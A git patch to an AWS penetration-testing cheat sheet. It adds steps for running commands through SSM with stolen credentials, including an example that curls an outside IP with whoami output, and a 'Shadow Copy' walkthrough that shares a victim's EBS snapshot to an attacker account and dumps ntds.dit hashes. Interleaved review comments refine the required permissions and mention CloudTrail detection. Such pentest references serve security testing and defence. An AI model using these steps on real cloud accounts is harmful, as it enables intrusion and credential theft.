From 1f3a94ba88ae16831b7f83c273a3a0ca685025c5 Mon Sep 17 00:00:00 2001
From: Swissky <12152583+swisskyrepo@users.noreply.github.com>
Date: Fri, 6 Mar 2020 15:30:38 +0100
Subject: [PATCH] AWS SSM + Shadow copy attack

---
 .../Cloud - AWS Pentest.md | 37 +++++++++++++++++++
 1 file changed, 37 insertions(+)

diff --git a/Methodology and Resources/Cloud - AWS Pentest.md b/Methodology and Resources/Cloud - AWS Pentest.md
index 84f624d..bfe25c0 100644
--- a/Methodology and Resources/Cloud - AWS Pentest.md
+++ b/Methodology and Resources/Cloud - AWS Pentest.md
@@ -18,6 +18,7 @@
 * [AWS - Lambda - Extract function's code](#aws---lambda---extract-functions-code)
 * [AWS - SSM - Command execution](#aws---ssm---command-execution)
 * [AWS - Golden SAML Attack](#aws---golden-saml-attack)
+* [AWS - Shadow Copy Attack](#aws---shadow-copy-attack)
 * [Cover tracks by obfuscating Cloudtrail logs and Guard Duty](#cover-tracks-by-obfuscating-cloudtrail-logs-and-guard-duty)
 * [PenTest:IAMUser/KaliLinux](#)
 * [PenTest:IAMUser/ParrotLinux](#)
@@ -394,10 +395,24 @@ $ wget -O lambda-function.zip url-from-previous-query --profile uploadcreds
 ## AWS - SSM - Command execution
+:warning: The ssm-user account is not removed from the system when SSM Agent is uninstalled.
+
+SSM Agent is preinstalled, by default, on the following Amazon Machine Images (AMIs):
+* Windows Server 2008-2012 R2 AMIs published in November 2016 or later
+* Windows Server 2016 and 2019
+* Amazon Linux
+* Amazon Linux 2
+* Ubuntu Server 16.04
+* Ubuntu Server 18.04
+* Amazon ECS-Optimized
+
 ```powershell
 $ aws ssm describe-instance-information --profile stolencreds --region eu-west-1
 $ aws ssm send-command --instance-ids "INSTANCE-ID-HERE" --document-name "AWS-RunShellScript" --comment "IP Config" --parameters commands=ifconfig --output text --query "Command.CommandId" --profile stolencreds
 $ aws ssm list-command-invocations --command-id "COMMAND-ID-HERE" --details --query "CommandInvocations[].CommandPlugins[].{Status:Status,Output:Output}" --profile stolencreds
+
+e.g:
+$ aws ssm send-command --instance-ids "i-05b████████adaa" --document-name "AWS-RunShellScript" --comment "whoami" --parameters commands='curl 162.243.███.███:8080/`whoami`' --output text --region=us-east-1
 ```
 ## AWS - Golden SAML Attack
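Review bot: The added AMI list reads as if any instance built from those images can be driven with `send-command`, but an instance only shows up in `describe-instance-information` once its agent has registered, which needs an instance profile granting the SSM registration/messaging permissions (e.g. the `AmazonSSMManagedInstanceCore` managed policy) and network reachability to the SSM endpoints; the stolen credentials additionally need `ssm:SendCommand` on the target instance and on the `AWS-RunShellScript` document. A one-line caveat under the list would prevent wasted effort, e.g. `Only instances whose agent has registered (instance profile + SSM endpoint access) are listed; send-command requires ssm:SendCommand on both the instance and the document.` It is also worth noting next to the `e.g:` example that every `SendCommand` is recorded in CloudTrail and that command output is typically shipped to S3/CloudWatch when output logging is configured, which ties into the "Cover tracks" section further down.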
@@ -419,6 +434,28 @@ $ python .\shimit.py -idp http://adfs.lab.local/adfs/services/trust -pk key_file
 -u domain\admin -n admin@domain.com -r ADFS-admin -r ADFS-monitor -id 123456789012
 ```
+## AWS - Shadow Copy attack
+
+Prerequisite:
+* EC2:CreateSnapshot
+* CloudCopy - https://github.com/Static-Flow/CloudCopy
+
+1. Load AWS CLI with Victim Credentials that have at least CreateSnapshot permissions
+2. Run `"Describe-Instances"` and show in list for attacker to select
+3. Run `"Create-Snapshot"` on volume of selected instance
+4. Run `"modify-snapshot-attribute"` on new snapshot to set `"createVolumePermission"` to attacker AWS Account
+5. Load AWS CLI with Attacker Credentials
+6. Run `"run-instance"` command to create new linux ec2 with our stolen snapshot
+7. Ssh run `"sudo mkdir /windows"`
+8. Ssh run `"sudo mount /dev/xvdf1 /windows/"`
+9. Ssh run `"sudo cp /windows/Windows/NTDS/ntds.dit /home/ec2-user"`
+10. Ssh run `"sudo cp /windows/Windows/System32/config/SYSTEM /home/ec2-user"`
+11. Ssh run `"sudo chown ec2-user:ec2-user /home/ec2-user/*"`
+12. SFTP get `"/home/ec2-user/SYSTEM ./SYSTEM"`
+13. SFTP get `"/home/ec2-user/ntds.dit ./ntds.dit"`
+14. locally run `"secretsdump.py -system ./SYSTEM -ntds ./ntds.dit local -outputfile secrets'`, expects secretsdump to be on path
+
+
 ## Cover tracks by obfuscating Cloudtrail logs and Guard Duty
 :warning: When using awscli on Kali Linux, Pentoo and Parrot Linux, a log is generated based on the user-agent.
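Review bot: The `Prerequisite` list and step 1 claim `EC2:CreateSnapshot` alone is enough, but steps 2 and 4 call `describe-instances` and `modify-snapshot-attribute`, so the victim credentials also need `ec2:DescribeInstances` (and in practice `ec2:DescribeVolumes` to resolve the instance's volume) plus `ec2:ModifySnapshotAttribute`; the bullet should read `* ec2:DescribeInstances, ec2:DescribeVolumes, ec2:CreateSnapshot, ec2:ModifySnapshotAttribute`. Step 4 deserves a caveat that sharing fails for snapshots encrypted with the AWS-managed default EBS key, and that a snapshot encrypted with a customer-managed key is only usable by the attacker account if the key policy also grants it access. Step 8 hard-codes `/dev/xvdf1`; on Nitro-based instances the attached volume appears as an NVMe device (e.g. `/dev/nvme1n1p1`), so `lsblk` should be run first. From the defender's side, the `ModifySnapshotAttribute` call that grants `createVolumePermission` to a foreign account is a high-signal CloudTrail event worth mentioning. Step 14 also has a mismatched quote (`"secretsdump.py ... secrets'`).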